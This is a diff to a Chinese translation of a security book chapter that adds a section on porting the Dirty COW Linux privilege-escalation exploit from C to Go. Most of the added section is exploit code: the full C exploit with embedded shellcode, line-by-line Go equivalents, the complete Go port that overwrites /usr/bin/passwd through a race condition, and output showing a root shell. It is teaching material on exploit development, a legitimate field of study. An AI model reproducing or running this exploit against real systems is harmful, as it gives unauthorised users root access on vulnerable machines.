ch-9 Porting an Exploit from C

--- a/ch-9/第9章：编写并移植漏洞代码.md
+++ b/ch-9/第9章：编写并移植漏洞代码.md
@@ -291,7 +291,7 @@ $ go run main.go
 
 诚然，在后面的章节中，尤其是在我们讨论底层Windows交互时，其中一些包被证明更有用，但是我们已经包含了这个列表供查看。我们不会尝试详细介绍这些包，而是展示如何通过使用其中一些包来移植现有漏洞开发程序。
 
-#### 从Python移植漏洞
+#### 移植Python代码漏洞
 
 在第一个例子中，将移植2015年发布的Java反序列化漏洞。该漏洞归类为几个CVE，它影响常见应用程序，服务器和库中Java对象的反序列化。反序列化库引入了此漏洞，该库无法在服务器端执行之前的验证输入（漏洞的常见原因）。我们将重点放在开发流行的Java Enterprise Edition应用程序服务器JBoss上。在 *https://github.com/roo7break/serialator/blob/master/serialator.py* 上，有一个Python脚本，其中包含可在多个应用程序中使用此漏洞的逻辑。清单9-3提供需要复制的逻辑。
 
@@ -404,4 +404,515 @@ func jboss(host string, ssl bool, cmd string) (int, error) {
 | struct.unpack(*fmt*, *string*)          | binary.Read(*. . .*)            | The inverse of struct.pack and binary. Write. Reads structured binary data into a specified format and type. |
 
 
+
+#### 移植C代码漏洞
+
+让我们把注意力从Python移到C上。C可以说是一种比Python可读性差的语言，但是C与Go的相似之处比Python多。从C移植漏洞比想象的要容易。为了演示，我们将为Linux移植一个本地特权升级漏洞。该漏洞称为 *Dirty COW*，与Linux内核的内存子系统中的竞争状况有关。此漏洞在披露时影响了大多数（如果不是全部）常见的Linux和Android发行版。此漏洞已得到修补，因此需要采取一些具体措施来重现以下示例。具体来说，需要配置具有易受攻击的内核版本的Linux系统。进行相关设置超出了本章的范围。但是，作为参考，我们使用内核版本为3.13.1的64位Ubuntu 14.04 LTS发行版。
+
+该漏洞利用程序的几种变体是公开可用的。可以在https://www.exploit-db.com/exploits/40616/找到要复制的副本。清单9-5显示了完整的原始漏洞代码，并对其进行了稍微的修改以提高可读性。
+
+```C
+#include <stdio.h> 
+#include <stdlib.h> 
+#include <sys/mman.h> 
+#include <fcntl.h> 
+#include <pthread.h> 
+#include <string.h> 
+#include <unistd.h>
+void *map;
+int f;
+int stop = 0;
+struct stat st;
+char *name;
+pthread_t pth1,pth2,pth3;
+
+// change if no permissions to read 
+char suid_binary[] = "/usr/bin/passwd";
+
+unsigned char sc[] = {
+	0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+    --snip--
+	0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
+};
+unsigned int sc_len = 177;
+
+void *madviseThread(void *arg)
+{
+	char *str;
+	str=(char*)arg;
+	int i,c=0;
+	for(i=0;i<1000000 && !stop;i++) {
+		c+=madvise(map,100,MADV_DONTNEED); 
+    }
+	printf("thread stopped\n"); 
+}
+
+void *procselfmemThread(void *arg)
+{
+	char *str;
+	str=(char*)arg;
+	int f=open("/proc/self/mem",O_RDWR); int i,c=0;
+	for(i=0;i<1000000 && !stop;i++) {
+        lseek(f,map,SEEK_SET);
+		c+=write(f, str, sc_len); 
+    }
+	printf("thread stopped\n"); 
+}
+
+void *waitForWrite(void *arg) {
+    char buf[sc_len];
+	for(;;) {
+		FILE *fp = fopen(suid_binary, "rb");
+        
+        fread(buf, sc_len, 1, fp);
+
+        if(memcmp(buf, sc, sc_len) == 0) {
+			printf("%s is overwritten\n", suid_binary); 
+            break;
+		}
+        fclose(fp);
+		sleep(1); 
+    }
+    
+    stop = 1;
+    
+	printf("Popping root shell.\n"); 
+    printf("Don't forget to restore /tmp/bak\n");
+    
+    system(suid_binary);
+}
+
+int main(int argc,char *argv[]) {
+    char *backup;
+
+    printf("DirtyCow root privilege escalation\n"); 
+    printf("Backing up %s.. to /tmp/bak\n", suid_binary);
+
+    asprintf(&backup, "cp %s /tmp/bak", suid_binary); 
+    system(backup);
+
+    f = open(suid_binary,O_RDONLY); 
+    fstat(f,&st);
+
+    printf("Size of binary: %d\n", st.st_size);
+	
+    char payload[st.st_size]; 
+    memset(payload, 0x90, st.st_size); 
+    memcpy(payload, sc, sc_len+1);
+
+    map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
+
+    printf("Racing, this may take a while..\n");
+    
+    pthread_create(&pth1, NULL, &madviseThread, suid_binary);
+    pthread_create(&pth2, NULL, &procselfmemThread, payload);
+    pthread_create(&pth3, NULL, &waitForWrite, NULL);
+    
+    pthread_join(pth3, NULL);
+
+    return 0; 
+}
+
+```
+
+清单9-5 C语言编写的Dirty COW特权升级漏洞
+
+与其解释C代码逻辑的细节，不如先从整体上看一下，然后将其分块，逐行与Go版本进行比较。该漏洞利用可执行文件和可链接格式（ELF）定义了一些恶意的Shell代码，该代码可生成Linux Shell。通过创建多个线程来作为特权用户执行代码，这些线程调用各种系统函数来将我们的shellcode写入内存位置。最终，shellcode通过覆盖碰巧已设置了SUID位并属于root用户的二进制可执行文件的内容来利用此漏洞。在本例中，二进制文件是 */usr/bin/passwd*，通常非root用户不能覆盖该文件。但是，由于 *Dirty COW* 漏洞，可以在保留文件权限的同时将任意内容写入文件，从而实现了特权升级。
+
+现在将C代码分解为易于理解的部分，并将每个部分与Go中的等价部分进行比较。请注意，Go代码专门尝试实现C代码的逐行复制。清单9-6是在C语言函数之外定义或初始化的全局变量，而清单9-7是在Go中定义或初始化的全局变量。
+
+```C
+void *map; 
+int f;
+int stop = 0;
+struct stat st;
+char *name;
+pthread_t pth1,pth2,pth3;
+
+// change if no permissions to read 
+char suid_binary[] = "/usr/bin/passwd";
+
+unsigned char sc[] = {
+	0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    --snip--
+	0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
+};
+unsigned int sc_len = 177;
+```
+
+清单 9-6:  C中的初始化
+
+```Go
+var mapp uintptr
+var signals = make(chan bool, 2) 
+const SuidBinary = "/usr/bin/passwd"
+
+var sc = []byte{
+	0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    --snip--
+	0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05,
+}
+```
+
+清单 9-7:  Go中的初始化
+
+C和Go之间的翻译非常简单。C和Go这两个代码部分保持相同的编号，以演示Go如何实现与C代码各自行相似的功能。在这两种情况下，通过定义 `uintptr` 变量来跟踪映射的内存。在Go中，将变量名声明为 `mapp`，因为与C不同，`map` 在Go中是一个保留关键字。然后初始化一个变量，用于通知线程停止处理。Go约定不是像C语言那样使用整数，而是使用带有缓冲的布尔管道。将其长度明确定义为2，因为将有两个发出信号的并发函数。接下来，为SUID可执行文件定义一个字符串，并通过将Shellcode硬编码到切片片来封装全局变量。与C版本相比，Go代码中省略了一些全局变量，这意味着将在相应的代码块中根据需要定义它们。
+
+接下来看下 `madvise()` 和 `procselfmem()` 这两个使用竞争条件的主要函数。同样，我们将清单9-8中的C版本与清单9-9中的Go版本进行比较。
+
+```C
+void *madviseThread(void *arg)
+{
+	char *str;
+	str=(char*)arg;
+	int i,c=0;
+	for(i=0;i<1000000 && !stop;i++) {
+		c+=madvise(map,100,MADV_DONTNEED); 
+    }
+	printf("thread stopped\n"); 
+}
+
+void *procselfmemThread(void *arg)
+{
+	char *str;
+	str=(char*)arg;
+	int f=open("/proc/self/mem",O_RDWR); int i,c=0;
+	for(i=0;i<1000000 && !stop;i++) {
+		lseek(f,map,SEEK_SET); 
+        c+=write(f, str, sc_len);
+	}
+	printf("thread stopped\n"); 
+}
+```
+
+清单 9-8: C中的竞争条件函数
+
+```Go
+func madvise() {
+	for i := 0; i < 1000000; i++ {
+		select {
+			case <- signals:u
+			fmt.Println("madvise done")
+            return
+        default:
+			syscall.Syscall(syscall.SYS_MADVISE, mapp, uintptr(100), syscall.MADV_DONTNEED)
+        }
+	} 
+}
+
+func procselfmem(payload []byte) {
+	f, err := os.OpenFile("/proc/self/mem", syscall.O_RDWR, 0) 
+    if err != nil {
+		log.Fatal(err) 
+    }
+    for i := 0; i < 1000000; i++ { 
+        select {
+            case <- signals:u fmt.Println("procselfmem done") return
+		default:
+			syscall.Syscall(syscall.SYS_LSEEK, f.Fd(), mapp, uintptr(os.SEEK_SET))w f.Write(payload) 
+        } 
+    }
+}
+```
+
+清单 9-9: Go中的竞争条件函数
+
+竞争条件函数使用各种变量进行信号传递。这两个函数都包含for循环，该循环需要多次迭代。C版本检查 `stop` 变量的值，而Go版本使用 `select` 语句尝试从 `signals` 管道读取。当信号出现时，函数返回。如果没有信号在等待，则执行 `default` 。`madvise()` 和`procselfmem()` 函数之间的主要区别是 `default` 的处理。在我们的 `madvise()` 函数中您向 `madvise()` 函数发出一个Linux系统调用，而 `procselfmem()` 函数则向 `lseek()` 发出Linux系统调用，并将有效负载写入内存。
+
+以下是这些函数的C和Go版本之间的主要区别：
+
+- Go版本使用管道来确定何时提前中断循环，而C函数使用一个整数值来指示发生线程竞争何时中断循环。
+- Go版本使用 `syscall` 包调用Linux系统。传递给该函数的参数包括要调用的系统函数及其必需的参数。可以通过搜索Linux文档来找到函数的名称，用途和参数。这就是我们能够调用本地Linux函数的方式。
+
+现在来回顾一下 `waitForWrite()` 函数，该函数监视SUID是否发生更改，以便执行shellcode。C版本如清单9-10所示，Go版本如清单9-11所示。
+
+```C
+void *waitForWrite(void *arg) {
+    char buf[sc_len];
+	for(;;) {
+		FILE *fp = fopen(suid_binary, "rb");
+                         
+        fread(buf, sc_len, 1, fp);
+
+        if(memcmp(buf, sc, sc_len) == 0) {
+			printf("%s is overwritten\n", suid_binary); break;
+		}
+        fclose(fp);
+		sleep(1); 
+    }
+    stop = 1;
+    printf("Popping root shell.\n");
+	printf("Don't forget to restore /tmp/bak\n");
+	system(suid_binary); 
+}
+```
+
+清单 9-10: C 中的 *waitForWrite()* 函数
+
+```Go
+func waitForWrite() {
+	buf := make([]byte, len(sc))
+	for {
+		f, err := os.Open(SuidBinary) 
+        if err != nil {
+			log.Fatal(err) 
+        }
+		if _, err := f.Read(buf); err != nil { 
+            log.Fatal(err)
+		}
+		f.Close()
+		if bytes.Compare(buf, sc) == 0 {
+			fmt.Printf("%s is overwritten\n", SuidBinary)
+			break 
+        }
+		time.Sleep(1*time.Second) 
+    }
+	signals <- true 
+    signals <- true
+    
+	fmt.Println("Popping root shell") 
+    fmt.Println("Don't forget to restore /tmp/bak\n")
+	
+    attr := os.ProcAttr {
+		Files: []*os.File{os.Stdin, os.Stdout, os.Stderr},
+	}
+	proc, err := os.StartProcess(SuidBinary, nil, &attr)
+    if err !=nil {
+		log.Fatal(err) 
+    }
+	proc.Wait()
+	os.Exit(0) 
+}
+```
+
+清单 9-11: Go中的 *waitForWrite()* 函数
+
+在这两种情况下，代码都定义了一个无限循环，该循环监视SUID二进制文件的变动。C中使用 `memcmp()` shellcode是否已写入目标，而Go代码使用 `bytes.Compare()`。当shellcode出现时，就会知道该漏洞成功地覆盖了文件。然后跳出无限循环，向正在运行的线程发出信号，表示它们现在可以停止了。与竞争条件的代码一样，Go版本通过通道来实现这一点，而C版本使用一个整数。最后，执行的可能是函数中最好的部分：SUID目标文件现在包含了恶意代码。Go代码有点冗长，因为需要传入与stdin, stdout和stderr对应的属性：分别指向打开输入文件、输出文件和错误文件描述符的文件指针。
+
+现在看一下 `main()` 函数，它调用前面执行此漏洞所需的函数。清单9-12是C代码，清单9-13是Go代码。
+
+```C
+int main(int argc,char *argv[]) {
+    char *backup;
+    
+	printf("DirtyCow root privilege escalation\n"); 
+    printf("Backing up %s.. to /tmp/bak\n", suid_binary);
+    
+	asprintf(&backup, "cp %s /tmp/bak", suid_binary); 
+    system(backup);
+    
+	f = open(suid_binary,O_RDONLY); 
+    fstat(f,&st);
+    
+	printf("Size of binary: %d\n", st.st_size);
+
+    char payload[st.st_size]; 
+    memset(payload, 0x90, st.st_size); 
+    memcpy(payload, sc, sc_len+1);
+
+    map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0); 
+    
+    printf("Racing, this may take a while..\n");
+    
+	pthread_create(&pth1, NULL, &madviseThread, suid_binary); 
+    pthread_create(&pth2, NULL, &procselfmemThread, payload); 
+    pthread_create(&pth3, NULL, &waitForWrite, NULL);
+    
+    pthread_join(pth3, NULL);
+
+    return 0; 
+}
+```
+
+清单 9-12: C中的 *main()* 函数
+
+```Go
+func main() {
+	fmt.Println("DirtyCow root privilege escalation") 
+    fmt.Printf("Backing up %s.. to /tmp/bak\n", SuidBinary)
+
+    backup := exec.Command("cp", SuidBinary, "/tmp/bak") 
+    if err := backup.Run(); err != nil {
+		log.Fatal(err) 
+    }
+
+    f, err := os.OpenFile(SuidBinary, os.O_RDONLY, 0600) 
+    if err != nil {
+		log.Fatal(err) 
+    }
+	st, err := f.Stat() 
+    if err != nil {
+		log.Fatal(err) 
+    }
+    
+	fmt.Printf("Size of binary: %d\n", st.Size())
+
+    payload := make([]byte, st.Size()) 
+    for i, _ := range payload {
+		payload[i] = 0x90 
+    }
+	for i, v := range sc { 
+        payload[i] = v
+	}
+
+    mapp, _, _ = syscall.Syscall6( 
+        syscall.SYS_MMAP,
+		uintptr(0), 
+        uintptr(st.Size()), 
+        uintptr(syscall.PROT_READ), 
+        uintptr(syscall.MAP_PRIVATE), 
+        f.Fd(),
+		0,
+	)
+
+    fmt.Println("Racing, this may take a while..\n") 
+    go madvise()
+    go procselfmem(payload)
+    waitForWrite()
+}
+
+```
+
+清单 9-13: Go中的 *main()* 函数
+
+ `main()` 函数首先备份目标可执行文件。由于最终要覆盖它，因此不想丢失原始版本；这样做可能会对系统造成不好的影响。虽然C可以通过调用 `system()` 将整个命令作为一个字符串传给它来运行操作系统命令，但是Go需要依赖于 `exec.Command()` 函数，该函数将命令作为单独的参数传递。接下来，以只读模式打开SUID目标文件，检索文件统计信息，然后使用它们来初始化与目标文件大小相同的有效负载切片。在C语言中，通过调用 `memset()`，使用NOP (0x90)指令填充数组，然后通过调用`memcpy()`，使用shellcode复制数组的一部分。Go中则没有这样便利的函数。
+
+相反，在Go中，循环遍历切片元素，并每次手动填充一个字节。之后，将对 `mapp()` 函数发出Linux系统调用，该函数会将目标SUID文件的内容映射到内存。对于以前的系统调用，可以通过搜索Linux文档来找到 `mapp()` 所需的参数。可能会注意到，Go代码调用`syscall.Syscall6()` 而不是调用 `syscall.Syscall()` 。`Syscall6()` 需要六个参数的系统调用，与 `mapp()` 一样。最后，代码启动了两个协程，并发地调用 `madvise()` 和 `procselfmem()` 函数。当竞争条件出现时，调用 `waitForWrite()` 函数，该函数监控SUID文件的改动，向线程发出停止的信号并执行恶意代码。
+
+为了完整起见，清单9-14是移植的Go代码的全部内容。
+
+```Go
+var mapp uintptr
+var signals = make(chan bool, 2) 
+const SuidBinary = "/usr/bin/passwd"
+
+var sc = []byte{
+	0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    --snip--
+	0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05,
+}
+
+func madvise() {
+	for i := 0; i < 1000000; i++ {
+		select {
+			case <- signals:
+			fmt.Println("madvise done")
+            return
+        default:
+			syscall.Syscall(syscall.SYS_MADVISE, mapp, uintptr(100), syscall.MADV_DONTNEED) }
+	} 
+}
+
+func procselfmem(payload []byte) {
+	f, err := os.OpenFile("/proc/self/mem", syscall.O_RDWR, 0) 
+    if err != nil {
+		log.Fatal(err) 
+    }
+	for i := 0; i < 1000000; i++ { 
+        select {
+		case <- signals: 
+            fmt.Println("procselfmem done") 
+            return
+		default:
+			syscall.Syscall(syscall.SYS_LSEEK, f.Fd(), mapp, uintptr(os.SEEK_SET))
+            f.Write(payload) 
+        }
+	} 
+}
+
+func waitForWrite() {
+	buf := make([]byte, len(sc)) 
+    for {
+		f, err := os.Open(SuidBinary) 
+        if err != nil {
+			log.Fatal(err) 
+        }
+		if _, err := f.Read(buf); err != nil { 
+            log.Fatal(err)
+		}
+		f.Close()
+		if bytes.Compare(buf, sc) == 0 {
+			fmt.Printf("%s is overwritten\n", SuidBinary)
+			break 
+        }
+		time.Sleep(1*time.Second) 
+    }
+	signals <- true 
+    signals <- true
+    
+	fmt.Println("Popping root shell") 
+    fmt.Println("Don't forget to restore /tmp/bak\n")
+	attr := os.ProcAttr {
+		Files: []*os.File{os.Stdin, os.Stdout, os.Stderr},
+	}
+	proc, err := os.StartProcess(SuidBinary, nil, &attr) 
+    if err !=nil {
+		log.Fatal(err) 
+    }
+	proc.Wait()
+	os.Exit(0) 
+}
+
+func main() {
+	fmt.Println("DirtyCow root privilege escalation") 
+    fmt.Printf("Backing up %s.. to /tmp/bak\n", SuidBinary)
+	backup := exec.Command("cp", SuidBinary, "/tmp/bak") 
+    if err := backup.Run(); err != nil {
+		log.Fatal(err) 
+    }
+	f, err := os.OpenFile(SuidBinary, os.O_RDONLY, 0600) 
+    if err != nil {
+		log.Fatal(err) 
+    }
+	st, err := f.Stat() 
+    if err != nil {
+        log.Fatal(err) 
+    }
+	
+    fmt.Printf("Size of binary: %d\n", st.Size())
+
+    payload := make([]byte, st.Size()) 
+    for i, _ := range payload {
+		payload[i] = 0x90 
+    }
+	for i, v := range sc { 
+        payload[i] = v
+	}
+    
+	mapp, _, _ = syscall.Syscall6( 
+        syscall.SYS_MMAP,
+		uintptr(0), 
+        uintptr(st.Size()), 
+        uintptr(syscall.PROT_READ), 
+        uintptr(syscall.MAP_PRIVATE), 
+        f.Fd(),
+        0, 
+    )
+    
+	fmt.Println("Racing, this may take a while..\n") 
+    go madvise()
+	go procselfmem(payload)
+	waitForWrite()
+}
+```
+
+清单 9-14: 完整的 Go 代码 (/ch-9/dirtycow/main.go/)
+
+要确认代码是否能正常运行，请在易受攻击的主机上运行。没有比看到root shell更令人满意的了。
+
+```shell
+alice@ubuntu:~$ go run main.go
+DirtyCow root privilege escalation Backing up /usr/bin/passwd.. to /tmp/bak Size of binary: 47032
+Racing, this may take a while..
+
+/usr/bin/passwd is overwritten 
+Popping root shell
+procselfmem done
+Don't forget to restore /tmp/bak
+
+root@ubuntu:/home/alice# id
+uid=0(root) gid=1000(alice) groups=0(root),4(adm),1000(alice)
+```
+
+如看见的那也，程序成功运行将备份/usr/bin /passwd文件，争夺句柄的控制权，用新的预期值覆盖文件位置，并最终生成一个系统shell。Linux id命令的输出确认alice帐户已经被提升到uid=0的值，表示root级别的特权。
 
